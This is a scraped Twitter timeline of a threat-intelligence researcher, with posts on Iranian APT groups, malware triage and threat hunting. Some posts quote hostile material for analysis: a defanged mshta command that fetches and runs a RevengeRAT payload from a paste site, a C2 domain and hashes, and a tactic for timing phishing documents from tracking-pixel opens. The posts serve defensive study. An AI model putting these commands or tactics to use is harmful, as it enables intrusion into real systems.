Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @ItsReallyNick
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ItsReallyNick
-
Prikvačeni tweet
In response to increased U.S.-Iran tensions & concerns of retaliatory cyber attacks, Iranian intrusion experts
@sj94356 &@QW5kcmV3 are on#StateOfTheHack for the latest on all things Iran:#APT33#APT34#APT35#APT39#MuddyWater & active UNC groups

https://twitter.com/FireEye/status/1218246639367798785 …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
https://whynotsecurity.com/blog/teamviewer/ … Teamviewer has been storing user passwords encrypted with AES, not hashed, in the registry accessible to low privilege users on the machine. This works for versions dating back from at least as far back as 2012 to the latest version.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
IF you got yourself a shiny Windows 10 environment & wanna find some malwares running in an elevated context, run a historical sweep for
parent process = “wsreset.exe”
process = !”mmc.exe”,!”reg.exe”
#threatintel#threathunting#dfirHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
https://www.virustotal.com/gui/file/0cf9facec3fefb77463f7ed3843e395f8ba46fd41d6e0edbfed94fdc8b554a11/details … - Stomps fakes VBA source - PCODE reveals a CobaltStrike stager - C2 in screenshotspic.twitter.com/5Vobo06nsQ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
Like puzzles? Here's an obfuscated PHP webshell that should scratch that itch. https://pastebin.com/ifsysYdB pic.twitter.com/yjzwFnFKPW
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
Getting DNS Client Cached Entries with CIM/WMIhttps://www.darkoperator.com/blog/2020/1/14/getting-dns-client-cached-entries-with-cimwmi …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
That's gotta be obnoxious as hell. Here you are trying to exfil documents for industrial espionage, and someone else just rolls up and encrypts it all for a cash grab. It's like the getaway driver for a bank heist getting carjacked while they're waiting.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Macho-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working. https://github.com/inv-ds-research/yaraml_rules …pic.twitter.com/sfuXEkHeNO
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
If you sorta liked the above, you'll LOVE this great new blog from
@MalwareUtkonos showing legit sites used to host similarly-encoded#RevengeRAT from persona "robacopony147"
https://blog.reversinglabs.com/blog/rats-in-the-library …pic.twitter.com/45PWnprWLJ
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Nick Carr proslijedio/la je Tweet
This is a GREAT technique for identifying devices and usage patterns of targets. Send at 8 AM, 9 AM, Noon ... opened on mobile. (Commute and lunch) Send between 10 and noon, opened on full device. Cool, now we know when to send the maldoc.
https://twitter.com/cglyer/status/1222255759687372801 …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
The other point here is that you should listen to
@cyb3rops' tips on common patterns: If you see: *^*4D, *^*5A, *^*90, *^*00, ... You can save time & breeze through any VBscript & PowerShell decoding from the original paste. You can strip it with a sloppy regex & decode the EXE.pic.twitter.com/LObexT9YuE
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
The other point here is that you should listen to
@cyb3rops' tips on common patterns: If you see: *^*4D, *^*5A, *^*90, *^*00, ... You can save time & breeze through any VBscript & PowerShell decoding from the original paste. You can strip it with a sloppy regex & decode the EXE.pic.twitter.com/LObexT9YuE
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
You should process these at scale and - outside of training - it's not a good use of time to step through them manually.
btw if you like network infrastructure triage, that DuckDNS C2 resolves to an IP address with :3389 open, serving up an SSL certificate exposing a hostname.Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g
note: simple backslash URL trick
know: "4D 5A" (MZ)
Result:
#RevengeRAT on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]orgpic.twitter.com/FCzsRaI9Ve
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
What % of malware uses non-TLS vs TLS for C2? Based on a (super biased) sample of ~10k binaries over 10 years I estimate it’s 90/10. Would love to see someone do a broader, less biased eval to see if it is on the rise (I don’t think it is)pic.twitter.com/2qbJF8Frjj
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
#APT34
has also used tracking pixels. It isn't a novel technique of course, but it is observed in the wild in targeted threat activity. Even beyond email, communication clients are notorious for leaking information. It's not a bad idea to rigorously test how they behave.https://twitter.com/cglyer/status/1222255797880619009 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
We’re turning on a tool for key moments of the 2020 US election that enables people to report misleading information about how to participate in an election or other civic event.pic.twitter.com/BxHAiLSWjG
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
We've all received emails with no attachment and assume it's "safe" to open in a mail client (as long as we don't explicitly click on any URLs). Right? Not so much...
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nick Carr proslijedio/la je Tweet
#idapro discovery of the day: you can apply structure offsets to a selection of code
select code range, press T, select your structure, be amazedpic.twitter.com/yyypOG0pJa
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
This thread contains a lot of info & examples of a highly-skilled red team that really wanted to know their UNC #.https://twitter.com/ItsReallyNick/status/1222360756202721282 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
"0X1F588277.doc"
957e8d6aa08af8c5d82cc3f5f23d86a5


35.236.203.52/match
team)
^very worth your time to chase, they do cool stuff
I made a logo 